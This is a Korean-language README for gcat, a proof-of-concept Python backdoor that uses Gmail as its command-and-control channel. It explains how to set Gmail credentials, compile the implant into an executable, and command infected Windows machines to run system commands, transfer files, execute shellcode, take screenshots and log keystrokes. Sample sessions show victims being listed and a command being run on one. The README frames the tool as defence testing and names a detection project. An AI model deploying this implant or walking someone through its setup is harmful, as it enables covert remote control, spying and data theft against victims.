
Gmail을 C&C 서버로 사용하는 PoC 백도어
Gmail을 명령 및 제어 서버로 사용하는 은밀한 Python 기반 백도어
이 프로젝트는 Benjamin Donnelly의 원본 PoC 코드에서 영감을 받았습니다.
... 조직이 이러한 유형의 공격에 대한 방어를 테스트할 수 있도록 공개되었습니다. 이를 탐지하려면 RITA와 같은 프로젝트를 참조하세요.
이 프로젝트의 더 최신 유지 관리 버전은 GDog를 참조하세요.
작동하려면 다음이 필요합니다:
이 저장소에는 두 개의 파일이 포함되어 있습니다:
gcat.py 사용 가능한 클라이언트를 열거하고 명령을 내리는 데 사용되는 스크립트implant.py 실제 배포할 백도어두 파일 모두에서 이전에 설정한 계정의 사용자 이름과 비밀번호로 gmail_user 및 gmail_pwd 변수를 편집하세요.
implant.py를 Pyinstaller를 사용하여 실행 파일로 컴파일하고 싶을 것입니다.
참고: 32비트 Python 설치를 사용하여 implant.py를 컴파일하는 것이 좋습니다
dP
88
.d8888b. .d8888b. .d8888b. d8888P
88' `88 88' `"" 88' `88 88
88. .88 88. ... 88. .88 88
`8888P88 `88888P' `88888P8 dP
.88
d8888P
.__....._ _.....__,
.": o :': ;': o :".
`. `-' .'. .'. `-' .'
`---' `---'
_...----... ... ... ...----..._
.-'__..-''---- `. `"` .' ----'''-..__`-.
'.-' _.--''' `-._.-' ''''--._ `-.`
' .-"' : `"-. `
' `. _.'"'._ .' `
`. ,.-'" "'-., .'
`. .'
jgs `-._ _.-'
`"'--...___...--'"`
...IM IN YUR COMPUTERZ...
WATCHIN YUR SCREENZ
optional arguments:
-h, --help 이 도움말 메시지를 표시하고 종료
-v, --version 프로그램 버전 번호를 표시하고 종료
-id ID 대상 클라이언트
-jobid JOBID 검색할 작업 ID
-list 사용 가능한 클라이언트 나열
-info 지정된 클라이언트의 정보 검색
Commands:
임플란트에서 실행할 명령어
-cmd CMD 시스템 명령 실행
-download PATH 클라이언트 시스템에서 파일 다운로드
-upload SRC DST 클라이언트 시스템에 파일 업로드
-exec-shellcode FILE 클라이언트에서 제공된 셸코드 실행
-screenshot 스크린샷 찍기
-lock-screen 클라이언트 화면 잠금
-force-checkin 체크인 강제 실행
-start-keylogger 키로거 시작
-stop-keylogger 키로거 중지
Meow!
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
출력은 시스템과 임플란트가 실행 중인 OS를 고유하게 식별하는 UUID 문자열입니다.
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
여기서는 90b2cd83-cb36-52de-84ee-99db6ff41a11에 ipconfig /all을 실행하도록 지시하고, 스크립트는 해당 명령의 출력을 검색하는 데 사용할 수 있는 jobid를 출력합니다.
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --